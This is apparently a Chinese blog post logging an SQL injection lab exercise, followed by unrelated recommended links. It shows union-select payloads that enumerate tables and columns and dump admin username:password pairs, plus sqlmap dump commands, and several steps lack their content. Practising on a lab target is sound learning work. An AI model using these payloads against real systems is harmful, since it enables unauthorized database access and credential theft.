SQL注入案例

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码


一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,':',password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

相关推荐
维基框架2 分钟前
Claude Mythos Preview 发布后严重漏洞激增:安全还是营销?
人工智能·安全
吴声子夜歌5 分钟前
SQL进阶——HAVING子句
数据库·sql
无小道25 分钟前
Redis——哨兵
数据库·redis·缓存·哨兵
碎碎念_49233 分钟前
ACL包过滤、NAT技术、广域网协议
服务器·网络·安全·acl·nat
闪电悠米1 小时前
黑马点评-Redis Set-实现关注、取关和共同关注
数据库·redis·缓存
爱奥尼欧1 小时前
轻量级可扩展日志框架-异步日志与系统集成
开发语言·数据库·c++·学习
爱奥尼欧1 小时前
轻量级可扩展日志框架-日志落地与日志器模块实现
jvm·数据库·c++
ycydynq1 小时前
Django利用中间间 判断页面是否登录,未登录则返回登录页
数据库·django·sqlite
承渊政道2 小时前
【MySQL数据库学习】(MySQL访问、连接池原理与简易网站数据流动)
数据库·学习·mysql·mysql访问·连接池原理
吴声子夜歌2 小时前
SQL进阶——EXISTS谓词
java·数据库·sql